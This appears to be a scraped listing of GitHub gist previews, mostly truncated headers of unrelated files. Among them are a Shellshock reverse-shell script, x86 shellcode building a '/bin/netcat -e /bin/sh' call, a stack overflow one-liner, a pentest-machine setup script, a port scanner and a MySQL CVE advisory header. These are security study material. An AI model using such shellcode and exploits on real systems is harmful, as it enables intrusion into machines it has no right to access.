python -c "print 'A'*70" | ./stack0
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[PHP] | |
;;;;;;;;;;;;;;;;;;; | |
; About php.ini ; | |
;;;;;;;;;;;;;;;;;;; | |
; PHP's initialization file, generally called php.ini, is responsible for | |
; configuring many of the aspects of PHP's behavior. | |
; PHP attempts to find and load this configuration from a number of locations. | |
; The following is a summary of its search order: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Customized VCL file for serving up a Drupal site with multiple back-ends. | |
# | |
# Based on this excellent Lullabot article: | |
# http://www.lullabot.com/articles/varnish-multiple-web-servers-drupal | |
# | |
# Hooks for New Relic | |
C{ | |
#include <sys/time.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# | |
# CVE-2014-6271 reverse shell | |
# | |
# Same as all the others, just showing off some pwntools. | |
# | |
# Usage: | |
# python shell.py http://host/cgi-bin/script.sh | |
# python shell.py http://host/cgi-bin/script.sh PORT=12345 | |
# |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jmp short forward | |
back: | |
pop esi | |
xor eax, eax | |
mov byte [esi + 11], al ; terminate /bin/netcat | |
mov byte [esi + 14], al ; terminate -e | |
mov byte [esi + 22], al ; terminate /bin/sh | |
mov byte [esi + 38], al ; terminate 127.127.127.127 | |
mov byte [esi + 43], al ; terminate 9999 | |
mov long [esi + 44], esi ; address of /bin/netcat in AAAA |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "" | |
echo "==========================================================================" | |
echo "= Pentest Attack Machine Setup =" | |
echo "= Based on the setup from The Hacker Playbook =" | |
echo "==========================================================================" | |
echo "" | |
# Prepare tools folder |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from scapy.all import sr, IP, TCP | |
import argparse | |
import time | |
class scanner(): | |
def __init__(self, host_start, host_end): |
This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# Script to reverse engineer the build of a given Debian / Ubuntu server | |
# I do this all the time: take an existing server, create a Bash / Ansible / Puppet / Chef | |
# built script, to allow Continuous Depoyment. | |
# It's tedious, but this script will give you the basics to get started. | |
# Make sure you have "sudo" access to get all the details. | |
# setup folders |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
============================================= | |
- Discovered by: Dawid Golunski | |
- http://legalhackers.com | |
- dawid (at) legalhackers.com | |
- CVE-2016-6662 | |
- Release date: 12.09.2016 | |
- Severity: Critical | |
============================================= |